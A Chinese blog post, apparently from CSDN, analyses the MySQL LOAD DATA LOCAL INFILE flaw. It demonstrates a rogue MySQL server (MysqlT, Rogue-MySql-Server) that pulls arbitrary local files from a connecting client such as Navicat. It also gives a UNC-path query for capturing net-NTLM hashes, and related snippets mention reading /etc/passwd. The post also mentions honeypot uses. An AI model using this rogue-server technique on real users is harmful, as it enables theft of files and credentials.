html读取本地txt_利用MySQL/MariaDB的逻辑缺陷伪造恶意服务端读取客户端文件

最新推荐文章于 2024-04-09 09:39:28 发布
最新推荐文章于 2024-04-09 09:39:28 发布
阅读量98 收藏
点赞数
文章标签: html读取本地txt mysql 客户端 mysql客户端 navicat打开db文件 发送soap请求 返回wsdl文件内容 客户端与服务端数据交互
为了方便某些场景的使用,MySQL提供了LOAD DATA LOCAL INFILE语句,允许从客户端导入文件数据到服务器中。然而,由于此功能的实现逻辑存在一定缺陷,可能会造成服务端能在未经客户端允许的情况下读取客户端的文件内容。 首先,我们来分析一下正常使用此功能时,客户端与服务端的流量交互过程。 这里笔者采用的PHPStudy搭建的MySQL环境。首先,开启正常的MySQL服务。

c25db75478c4c1b0e46960c7652ba70d.png

在“F:\test”新建一个pi.txt文件,内容如下。

85b6587be616641f2de83a99e629bc94.png

打开命令行,用MySQL monitor客户端(即MySQL.exe)连接上测试数据库,直接执行如下语句,将上述文件的内容记录到预先建立的mysql_test表内,注意在windows下路径中的反斜杠需要转义或改用斜杠: LOAD DATA LOCAL INFILE 'F:\\test\\pi.txt' INTOTABLE mysql_test FIELDS TERMINATED BY '\n'; 此时,指定的文件内容已经被记录到了表内,可以再执行select * from mysql_test;进行确认。

9957b09a09c27bfdf6745e7759e95105.png

观察流量,可以看到此客户端在尝试连接MySQL服务端,发送登录请求时,默认将“Can Use LOAD DATA LOCAL”置为了1,相当于告诉了服务端,我(客户端)这里支持LOAD DATA LOCAL语句,可以读取客户端本地的文件内容,加载到服务端。

9972f21ee57fbe9c00b0468534f6eba7.png

然后,又默认自动执行了一句查询语句,用于在banner中显示服务端的MySQL版本。补充一点,大多数客户端在连接时都会自动静默发送一些查询语句,用于初始化时提供更多信息。如Navicat会执行”SET NAMES utf8mb4”.这一步有一个小小的伏笔,我们后面再进行解释。

92152337010cce1d70283cb8896e12df.png

随后,观察流量可以看到,我们之前手动执行的LOAD DATA LOCAL命令:

ec860d60687519f15410ab5a9afef700.png

关键点来了。客户端输入上述命令之后,服务端发送了如下内容,控制客户端去读取相应的文件。这几步可以比喻为如下的沟通过程: 1.客户端:我要读取我本地的XXX文件到客户端那边的AA表中! 2.服务端:你快把XXX文件的内容告诉我。 3.客户端:XXX文件的内容是xxxxxx. 然而,第三步客户端的行为,仅仅受到第二步中服务端指令的控制,与第一步中的内容没有任何关系。所以,这里便出现了风险:如果客户端连接到了恶意的服务端,那么此服务端可以控制客户端去读取其能够读取到的任意文件并发送回服务端。也就是说,攻击者可以无视第一步客户端的请求内容,直接在第二步中构造下图中的请求,控制客户端发送指定的文件内容。

9e657a1a8e8c5c6f7693ac63d6761bd7.png

下一条流量包中可以看到,客户端确实向服务端发送了指定的文件内容:

345bbd2499616fcedf97c0625a103ae1.png

综上所述,攻击者可以通过模仿MySQL服务端的返回信息,伪造一个恶意的MySQL服务端,想办法引诱受害者与其进行连接,便可以控制受害者的客户端读取其本地任意指定的文件内容。 Github上已经有了现成的轮子,比如最早的“Rogue-MySql-Server”(https://github.com/Gifts/Rogue-MySql-Server),支持更多自定义功能的“MysqlT”(https://github.com/BeichenDream/MysqlT),这里用后者进行演示。 由于伪造的服务端直接通过返回信息欺骗客户端,模拟连接,所以并不需要真正的MySQL服务运行,我们先把正常的MySQL服务关闭。 下载release文件,按照教程运行并进行设定。 可以看到,这里我指定了欲读取文件的路径、伪造MySQL服务的用户名密码(客户端输入正确时,才返回连接成功的信息)

3c88b727563a44fe466cdf7b60d864b4.png

先再来确认下欲读取文件的内容,与这个恶意服务端目录中的文件内容:

3a377b4ac0d8ff3b398b92e9db8bc1c4.png

输入mysql run,启动对3306端口的监听,并等待客户端数据,模拟连接。

a0d1044b33876bcaf7f51504bc0cafcf.png

这里我们换一个服务端进行演示,顺便对上述的“伏笔”进行解释说明。 打开Navicat,填写对应的连接信息,然后点击“测试连接”。

eecba062a2f87e1139452e5a8a9a2cdf.png

可以看到,Navicat提示连接成功。 再来看看MysqlT:

ced3d6108dbe2c759cab1e3862dd8dc4.png

提示文件已经接收完毕。用tree /F查看文件夹结构,type输出文件内容,确定与test文件夹内的完全一致。

71ff4fa77696065f69099d83e7844bc9.png

抓包分析之。可以看到,Navicat的客户端在进行连接请求时,也把下述字段置为了1.

801da516c7c8067ec0be2307f9d30c4a.png

然后和上面提到的一样,Navicat客户端在连接时也静默执行了一条查询语句:

02cc44c2756a700495ffef00150f199c.png

这里补充说明一下,要让客户端向服务端发送本地文件的数据,每发送一个文件,都需要将上述的1、2、3三个步骤完整走一遍。只是对第一步中的内容没有要求,但需要客户端执行一次查询这个动作,这也是上面提到的“伏笔”背后的细节。 第一步已经满足了,那么服务端便可以直接开始伪造第二步的信息,控制客户端返回指定文件内容。抓包看到,伪造服务端发送的payload与之前正常客户端执行相应功能时的payload完全一致。

2bddd2242675ebe7a362c6f9b558c86a.png

上面已经提到,第三步完全仅由第二步服务端发送过来的命令进行控制,所以,可以预见地,客户端会乖乖向伪造服务端返回相应文件的内容。伪造的服务端接收到之后,就可以写入到文件记录。至此,整个攻击流程结束。 分析这个“漏洞”的应用场景,容易看出,这种技术除了用作攻击之外,还可应用于蜜罐中,达到反制攻击者的效果。 值得一提的是,LOAD DATA INFILE语句支持UNC路径,如果我们的恶意MySQL服务器运行在Windows系统上,我们还有可能使用如下查询语句获取内网用户的net-NTLM Hash: LOAD DATA LOCAL INFILE "\\HOSTNAME_OR_IP\test\pi.txt"INTO TABLE mysql_test FIELDS TERMINATED BY '\n'; 不过,需要对伪造的服务端进行另外的改动,暂不在本次讨论范围内。
weixin_39996478
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql协议包伪造_伪造mysql-server实现任意读取
weixin_35174422的博客
01-19 295
大概就类比于下面的对话:客户端:我想将/etc/passwd插入user表中服务端:那把/etc/passwd发给我客户端:巴拉巴拉我们所需要的做的就是搭建一个mysql服务端,然后完成上述过程,实现客户端的任意文件读取。LOAD DATA INFILE问题出在该语法上,该语法用于读取一个文件放入表中。两种用法如下:load data infile "/data/data.csv" into ta...
模拟服务器端服务
09-11
模拟服务器端服务,使用参考:https://blog.csdn.net/weixin_38289699/article/details/78527919 支持一下
MysqlT:伪造Myslq服务端,并利用Mysql逻辑漏洞来获取客户端的任意文件反击攻击者
05-04
MysqlT 404StarLink 2.0 - Galaxy MysqlT 是 404Team 中的一环,如果对MysqlT有任何疑问又或是想要找小伙伴交流,可以参考星链计划的加群方式。 伪造Myslq服务端,并利用Mysql逻辑漏洞来获取客户端的任意文件反击攻击者 当你需要将本地文件上传到服务器时,没有合适的上传器时,也可以使用本软件,小巧玲珑 该程序利用Mysql客户端LoadData的逻辑漏洞 与其它软件不同,本软件支持大文件无损传输 支持用户验证 支持自定义Mysql版本 随机的Salt加密,加上用户验证,让攻击者毫无察觉 Net文件夹是.NET程序只能运行在Windows NetCore文件夹是.NET CORE程序可以运行在 Windows,Linux,MAC 使用教程: 首次使用请在程序中输入Mysql Help,来查看帮助命令 你可以在程序根目录中的User.data文
伪造mysql服务端
tomyyyyy
08-23 284
伪造mysql服务端 原理概述 MySQL客户端服务端通信过程中是通过对话的形式来实现的,客户端发送一个操作请求,然后服务端根据客服端发送请求来响应客户端,在这个过程中客户端如果一个操作需要两步才能完成那么当它发送完第一个请求过后并不会存储这个请求,而是直接就丢掉了,所以第二步就是根据服务端的响应来继续进行,这里服务端就可以欺骗客户端做一些事情。 但是一般的通信都是客服端发送一个MySQL语...
伪造mysql服务端实现任意读取
dhyi38680的博客
12-16 195
  偶然看到大佬的一篇文章,讲利用mysql的LOAD DATA INFILE的功能读取客户端文件,觉得这个思路十分有趣,于是跟着大佬的思路复现了一遍。 0x01LOAD DATA INFILE   LOAD DATA INFILE是我十分陌生的一种用法,作用是可以把文件读入到数据库的某个表里,如果在远程连接状态下使用了LOCAL关键字,即LOAD DATE LOCAL INFIL...
一个简单java程序模拟与Mysql Server建立连接及发送查询SQL
weixin_34208283的博客
05-10 162
2019独角兽企业重金招聘Python工程师标准>>> ...
一些java考过的测试题和自己制作模拟服务端客户端
weixin_30569153的博客
05-05 101
媒体 1,java环境变量: PATH: .;%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin; CLASSPATH: .;%JAVA_HOME%\jre\lib\rt.jar;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar; JAVA_HOME: jdk安装路径 java运行原理: Java应...
MySQL/MariaDB/Percona数据库升级脚本
01-20
MySQL/MariaDB/Percona数据库升级脚本 MySQL/MariaDB/Percona数据库升级脚本截取《OneinStack》中upgrade_db.sh,一般情况下不建议升级数据库版本,该脚本专提供给各位版本控们。为防止大版本之间兼容问题,脚本默认...
轻量级 Mysql/MariaDB Binlog 客户端,为第三方提供数据订阅服务
11-16
本项目“轻量级Mysql/MariaDB Binlog客户端”旨在为第三方提供一个高效且易于集成的工具,以实时获取和处理数据库的变更事件。 首先,我们需要理解什么是Binlog。在MySQLMariaDB中,Binlog是一种记录所有改变...
简洁好用的数据库表结构文档工具,支持MySQL/MariaDB/SqlServer/oracle/PostgreSQL/TIDB
最新发布
08-06
简洁好用的数据库表结构文档工具,支持MySQL/MariaDB/SqlServer/oracle/PostgreSQL/TIDB/CacheDB 数据库。简洁好用的数据库表结构文档工具,支持MySQL/MariaDB/SqlServer/oracle/PostgreSQL/TIDB/CacheDB 数据库。...
Qt6.3.1用于连接MySQL/MariaDB的驱动文件,新测可用!
07-28
1.将压缩文件展开,内含两个目录MinGW_11.2.0_64和MSVC2019_64,分别用于支持MinGW64和MSVC64编译器; 2.分别对应编译器目录下Bin文件夹中的文件拷贝到Bin目录内,将sqldrivers文件夹中的文件拷贝到plugins\...
模拟服务端工具.rar
12-22
模拟服务端工具(TCP/UDP),用于模拟服务端接收数据,目前支持 TCP/UDP 协议开启监听
java 模拟mysql
06-18
很经典的gui很棒,纯java编写,实现了不少功能
tcp服务端&客户端模拟器
04-10
tcp服务端&客户端模拟器 直接安装 即可测试TCP连通性
游戏服务端+模拟游戏客户端
02-02
游戏服务端+模拟游戏客户端游戏服务端+模拟游戏客户端
探秘MySQL Fake Server:一个模拟数据库服务器的强大工具
gitblog_00070的博客
04-09 595
探秘MySQL Fake Server:一个模拟数据库服务器的强大工具 项目地址:https://gitcode.com/fnmsd/MySQL_Fake_Server 项目简介 在软件开发和测试过程中,有时我们无法直接使用真实的生产数据,或是出于隐私保护、性能压力测试等需求,需要一个可以模拟MySQL数据库行为的服务。这就是MySQL Fake Server项目的由来。它是一个轻量级的、高度可配...
伪造mysql服务实现任意文件下载漏洞
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
10-25 1504
文章目录环境准备安装wireshark安装mysql漏洞分析利用思路原理构造 环境准备 这个问题主要是出在LOAD DATA INFILE这个语法上,这个语法主要是用于读取一个文件内容并且放到一个表中。通常有两种用法,分别是: load data infile “/etc/passwd” into table TestTable; load data local infile “/etc/passwd” into table TestTable; 有时候也会与FIELDS TERMINATED BY '\
服务器模拟mysql协议_MySQL客户端/服务器协议
weixin_36080474的博客
02-12 162
查询的实行路径: 这个协议是半双工的,这意味着MySQL服务器在某个给定的时间,可以发送或接收数据,但是不能同时发送和接收。这也意味着没有办法截断消息。这种协议让MySQL的沟通简单而又快捷,但是它也有一些限制。其中一个就是无法进行流程控制,一旦一方发送消息,另一方在发送回复之前就必须提取完整的消息。这像来回抛球的游戏:在任意时刻,只有某一方有球,而且除非有球在手上,否则就不能把球抛回去(发送消息...
模拟服务端与客服端会话、传输图片、数据
qx020814的博客
07-12 150
这里我要说一个三次握手、四次挥手三次握手:1:A——>B A向B发送连接请求2:AB A向B发送确定连接以上便是三次握手断开连接时的四次挥手:1:A——>B A向B发送断开请求2:A
mysql/mariadb 主从同步出错 exceeded max_allowed_packet; Increase max_allowed_packet on master;
08-09
MySQL/MariaDB主从同步出现"exceeded max_allowed_packet"错误时,可以通过增加主服务器上的max_allowed_packet参数来解决。这个参数定义了发送给从服务器的单个语句的最大大小限制。你可以通过以下步骤来增加max_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值